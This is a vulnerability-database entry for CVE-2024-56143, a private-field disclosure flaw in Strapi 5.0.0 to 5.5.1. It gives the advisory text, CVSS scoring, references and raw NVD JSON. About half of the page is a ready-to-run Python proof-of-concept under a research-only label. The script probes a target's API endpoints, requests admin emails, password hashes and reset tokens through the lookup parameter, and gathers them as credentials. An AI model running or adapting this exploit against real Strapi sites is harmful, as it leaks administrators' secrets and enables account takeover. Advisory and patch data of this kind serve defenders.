Security Vulnerability Report
CVE-2024-56143 CVSS 8.2 HIGH

CVE-2024-56143

Published: 2025-10-16 16:15:36
Last Modified: 2025-12-31 01:05:40

Description

Strapi is an open-source headless content management system. In versions from 5.0.0 to before 5.5.2, the lookup operator provided by the document service does not properly sanitize query parameters for private fields. An attacker can access private fields, including admin passwords and reset tokens, by crafting queries with the lookup parameter. This vulnerability is fixed in 5.5.2.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* - VULNERABLE
Strapi >=5.0.0, <5.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json
import requests

# Target Strapi instance URL
TARGET_URL = "http://target-strapi-instance.com"


# Step 1: Discover API endpoints
def discover_endpoints(base_url):
    # Common Strapi content types to probe
    content_types = ["articles", "users", "products", "categories"]
    endpoints = []
    for ct in content_types:
        url = f"{base_url}/api/{ct}"
        try:
            resp = requests.get(url, timeout=5)
            if resp.status_code == 200:
                endpoints.append(ct)
        except requests.exceptions.RequestException:
            pass
    return endpoints


# Step 2: Exploit lookup operator to access private fields
def exploit_lookup(base_url, content_type):
    """
    Craft a request using the lookup parameter to bypass field-level access
    control and extract private fields like admin passwords and reset tokens.
    """
    # The vulnerable lookup parameter allows accessing private fields
    # of related entities (e.g., admin users associated with content)
    exploit_params = {
        "lookup[admin][fields][0]": "email",
        "lookup[admin][fields][1]": "password",
        "lookup[admin][fields][2]": "resetPasswordToken",
        "lookup[admin][populate]": "*",
    }
    url = f"{base_url}/api/{content_type}"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0",
    }
    try:
        resp = requests.get(url, params=exploit_params, headers=headers, timeout=10)
        if resp.status_code == 200:
            data = resp.json()
            print(f"[+] Successfully extracted data from {content_type}:")
            print(json.dumps(data, indent=2))
            return data
        else:
            print(f"[-] Request failed with status: {resp.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    return None


# Step 3: Use extracted credentials for further exploitation
def extract_credentials(data):
    """Extract admin credentials from leaked data"""
    credentials = []
    if data and "data" in data:
        for item in data["data"]:
            if "admin" in item:
                admin = item["admin"]
                credentials.append({
                    "email": admin.get("email"),
                    "password_hash": admin.get("password"),
                    "reset_token": admin.get("resetPasswordToken"),
                })
    return credentials


if __name__ == "__main__":
    print("[*] CVE-2024-56143 - Strapi Private Field Disclosure PoC")
    print(f"[*] Target: {TARGET_URL}")
    endpoints = discover_endpoints(TARGET_URL)
    print(f"[*] Discovered endpoints: {endpoints}")
    for endpoint in endpoints:
        data = exploit_lookup(TARGET_URL, endpoint)
        if data:
            creds = extract_credentials(data)
            if creds:
                print(f"[+] Extracted credentials: {creds}")

References

https://github.com/strapi/strapi/commit/0c6e0953ae1e62afae9329de7ae6d6a5e21b95b8 (Patch)
https://github.com/strapi/strapi/security/advisories/GHSA-495j-h493-42q2 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2024-56143",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-16T16:15:36.183",
    "lastModified": "2025-12-31T01:05:40.340",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Strapi is an open-source headless content management system. In versions from 5.0.0 to before 5.5.2, the lookup operator provided by the document service does not properly sanitize query parameters for private fields. An attacker can access private fields, including admin passwords and reset tokens, by crafting queries with the lookup parameter. This vulnerability is fixed in 5.5.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.0.0",
                "versionEndExcluding": "5.5.2",
                "matchCriteriaId": "579D30B7-009F-49AB-B595-C3BC930594D9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/strapi/strapi/commit/0c6e0953ae1e62afae9329de7ae6d6a5e21b95b8",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/strapi/strapi/security/advisories/GHSA-495j-h493-42q2",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}